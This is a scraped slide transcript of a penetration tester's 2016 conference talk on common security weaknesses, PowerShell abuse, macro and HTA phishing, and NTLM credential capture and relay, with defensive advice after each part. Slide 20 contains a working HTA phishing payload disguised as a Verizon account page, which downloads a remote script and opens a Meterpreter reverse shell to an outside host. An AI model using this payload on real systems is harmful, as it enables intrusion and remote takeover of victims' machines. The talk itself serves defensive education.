Presentation is loading. Please wait.

Presentation is loading. Please wait.

©2014 CliftonLarsonAllen LLP CLAconnect.com See CLA PowerPoint User Guide for instructions to insert an image or change the icon on the business card.

Published byMoris Miller Modified over 8 years ago

Similar presentations

Presentation on theme: "©2014 CliftonLarsonAllen LLP CLAconnect.com See CLA PowerPoint User Guide for instructions to insert an image or change the icon on the business card."— Presentation transcript:

1 ©2014 CliftonLarsonAllen LLP CLAconnect.com See CLA PowerPoint User Guide for instructions to insert an image or change the icon on the business card. Find it at the bottom of the myCLA / Firm Resources / Materials / Templates page. See CLA PowerPoint User Guide for instructions to insert an image or change the icon on the business card. Find it at the bottom of the myCLA / Firm Resources / Materials / Templates page. Lessons Learned from a Penetration Tester NASCUS 2016

2 ©2014 CliftonLarsonAllen LLP Intro/Summary I am going to share with you: 1.whoami 2.Common security issues ◊ External ◊ Internal 3.PowerShell Overview 4.Popular attack vectors ◊ Phishing ◊ Internal network 5.Key defensive strategies

3 ©2014 CliftonLarsonAllen LLP whoami David Anderson Farm kid turned hacker dude Worked in IT for 6 years Penetration tester for 4+ years Yes, I am older than 18

4 ©2014 CliftonLarsonAllen LLP Common Issues The same thing….over and over….

5 ©2014 CliftonLarsonAllen LLP Common Issues from External Perspective 1.Poor email filtering a)Ability to spoof internal email addresses b)Ability to send malicious attachments 2.Not implementing two-factor authentication a)Outlook Web App b)VPN 3.Lack of filtering on perimeter a)Domain whitelisting b)Egress filtering c)SSL/TLS inspection

6 ©2014 CliftonLarsonAllen LLP Common Issues from Internal Perspective 1.Giving users local admin privileges 2.Sharing passwords/weak passwords a)Local admin account b)IT admins c)Service accounts 3.Weak/no encryption 4.Poor patching 5.End users a)Can we patch these???

7 ©2014 CliftonLarsonAllen LLP PowerShell That’s one powerful shell…

8 ©2014 CliftonLarsonAllen LLP PowerShell Windows scripting environment built on.NET Comes pre-installed –Attackers don’t have to worry about AV Able to perform many different tasks that command prompt couldn’t

9 ©2014 CliftonLarsonAllen LLP PowerShell Search for systems where you have local administrator access Search for where domain administrators are logged in Can download items from a URL Can inject malicious code straight into memory

10 ©2014 CliftonLarsonAllen LLP How to protect yourself Prevent standard users from executing PowerShell –Free Microsoft tools – AppLocker & Software Restriction Policies (SRP) Implement new PowerShell security features –Script Transcription –Script Block Logging Microsoft EMET to protect memory

11 ©2014 CliftonLarsonAllen LLP Phishing Vectors Same ol’ tricks…..

12 ©2014 CliftonLarsonAllen LLP Office Macros Macros allow attackers to access any applications/features that are installed or available on the user’s workstation Utilizing PowerShell, attackers can execute malicious code easily

13 ©2014 CliftonLarsonAllen LLP Office Macros

14 ©2014 CliftonLarsonAllen LLP Office Macros

15 ©2014 CliftonLarsonAllen LLP Office Macros How to protect yourself… Use Group Policy to disable macros –Office 2016 has new security features Teach users who utilize Macros the dangers of opening unknown documents

16 ©2014 CliftonLarsonAllen LLP Office Macros

17 ©2014 CliftonLarsonAllen LLP.HTA Payloads HTA > HTML Applications Allows attacker to run malicious applications on end user’s system Needs to be opened with Internet Explorer.HTA files get launched by trusted Microsoft application - mshta.exe

18 ©2014 CliftonLarsonAllen LLP.HTA Payloads

19 ©2014 CliftonLarsonAllen LLP.HTA Payloads From Microsoft - HTAs not only support everything a webpage …—but also HTA–specific functionality. This added functionality provides control over user interface design and access to the client system. Moreover, run as trusted applications, HTAs are not subject to the same security constraints as webpages. The end result is that an HTA runs like any executable (.exe) file written in C++ or Visual Basic.”

20 ©2014 CliftonLarsonAllen LLP.HTA Payloads Verizon Account Management Sub Initialize() Dim sCmd, iResult, sResultData, sMessage window.resizeTo 375,250 'Set command to call PowerShell script 'sCmd = "powershell.exe -nop -exec bypass -win hidden -command iex(New-Object Net.WebClient).DownloadString('https://hack.net/is');Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 11.22.33.44 -lport 443 -force" sCmd = "powershell.exe -nop -noni -exec bypass -win hidden -command iex(New-Object Net.WebClient).DownloadString('https://hack.net/is'); Invoke-Shellcode -payload windows/meterpreter/reverse_https - lhost 11.22.33.44 -lport 443 -force" 'Call PowerShell script Set oShell = CreateObject("Wscript.Shell") iResult = oShell.Run(sCmd, 0, true) 'Collect result from PowerShell (via clipboard) sResultData = window.clipboarddata.getdata("Text") End Sub

21 ©2014 CliftonLarsonAllen LLP.HTA Payloads

22 ©2014 CliftonLarsonAllen LLP.HTA Payloads

23 ©2014 CliftonLarsonAllen LLP.HTA Payloads How to protect yourself… Block mshta.exe from running on systems Web filter/Content filter – block.hta extension

24 ©2014 CliftonLarsonAllen LLP Internal Vectors Please give me your password…

25 ©2014 CliftonLarsonAllen LLP Gathering network creds Attacks Windows Single Sign-On Starts by spoofing UDP traffic –NetBIOS traffic –LLMNR traffic Tricks computer into attempting to authenticate to the attacker The computer automatically sends encrypted credentials to attacker

26 ©2014 CliftonLarsonAllen LLP Gathering network creds Metasploit has modules to perform this attack Attempt to crack weak passwords How we gain initial foothold on network 95% of the time

27 ©2014 CliftonLarsonAllen LLP Gathering network creds SMB Capture in Metasploit Using John the Ripper to crack the password

28 ©2014 CliftonLarsonAllen LLP Relaying network creds Instead of capture, we can relay Can be used to authenticate to alternate system or run malicious code on alternate system Need to have ADMIN privileges on target host

29 ©2014 CliftonLarsonAllen LLP Relay network creds

30 ©2014 CliftonLarsonAllen LLP How to protect yourself Enforce strong password requirements for ALL users –We can crack 8 character NTLM password in ~1 day –We can crack 8 character NetNTLMv2 password in ~11 days Enforce SMB Signing –This prevents man-in-the-middle attacks (stops relaying) Restrict admin rights

31 ©2014 CliftonLarsonAllen LLP How to protect yourself

32 ©2014 CliftonLarsonAllen LLP QUESTIONS

33 ©2014 CliftonLarsonAllen LLP 33 ©2014 CliftonLarsonAllen LLP CLAconnect.com twitter.com/ CLAconnect facebook.com/ cliftonlarsonallen linkedin.com/company/ cliftonlarsonallen Thank you! David Anderson, OSCP Manager, Information Security, Direct: 612-376-4699 Email: david.anderson@claconnect.com

Download ppt "©2014 CliftonLarsonAllen LLP CLAconnect.com See CLA PowerPoint User Guide for instructions to insert an image or change the icon on the business card."

Similar presentations

Enabling Secure Internet Access with ISA Server

Enabling Secure Internet Access with ISA Server
Slide Heading Seminar Series: Managing IT Risk In 2010 Understanding End User Attack Vectors Brian Judd, CISSP SynerComm January 20, 2009.

Slide Heading Seminar Series: Managing IT Risk In 2010 Understanding End User Attack Vectors Brian Judd, CISSP SynerComm January 20, 2009.
Web Filtering. ExchangeDefender Web Filtering provides policy-controlled protection from dangerous content on the web. Web Filtering is agent based, allowing.

Web Filtering. ExchangeDefender Web Filtering provides policy-controlled protection from dangerous content on the web. Web Filtering is agent based, allowing.
Understand Database Security Concepts

Understand Database Security Concepts
Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.

Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.
Module 4: Implementing User, Group, and Computer Accounts

Module 4: Implementing User, Group, and Computer Accounts
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
Trojan Horse Program Presented by : Lori Agrawal.

Trojan Horse Program Presented by : Lori Agrawal.
70-293: MCSE Guide to Planning a Microsoft Windows Server 2003 Network, Enhanced Chapter 13: Planning Server and Network Security.

70-293: MCSE Guide to Planning a Microsoft Windows Server 2003 Network, Enhanced Chapter 13: Planning Server and Network Security.
System and Network Security Practices COEN 351 E-Commerce Security.

System and Network Security Practices COEN 351 E-Commerce Security.
Configuring Windows Vista Security Chapter 3. IE7 Pop-up Blocker Pop-up Blocker prevents annoying and sometimes unsafe pop-ups from web sites Can block.

Configuring Windows Vista Security Chapter 3. IE7 Pop-up Blocker Pop-up Blocker prevents annoying and sometimes unsafe pop-ups from web sites Can block.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.

How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
7-Access Control Fundamentals Dr. John P. Abraham Professor UTPA.

7-Access Control Fundamentals Dr. John P. Abraham Professor UTPA.
Norman SecureSurf Protect your users when surfing the Internet.

Norman SecureSurf Protect your users when surfing the Internet.
Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.

Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.
Microsoft ® Official Course Module 9 Configuring Applications.

Microsoft ® Official Course Module 9 Configuring Applications.
Working with Applications Lesson 7. Objectives Administer Internet Explorer Secure Internet Explorer Configure Application Compatibility Configure Application.

Working with Applications Lesson 7. Objectives Administer Internet Explorer Secure Internet Explorer Configure Application Compatibility Configure Application.
Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.

Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.
1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.

1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.
By, Anish Shanmugasundaram Yashwanth Sainath Jammi.

By, Anish Shanmugasundaram Yashwanth Sainath Jammi.

Similar presentations

Ads by Google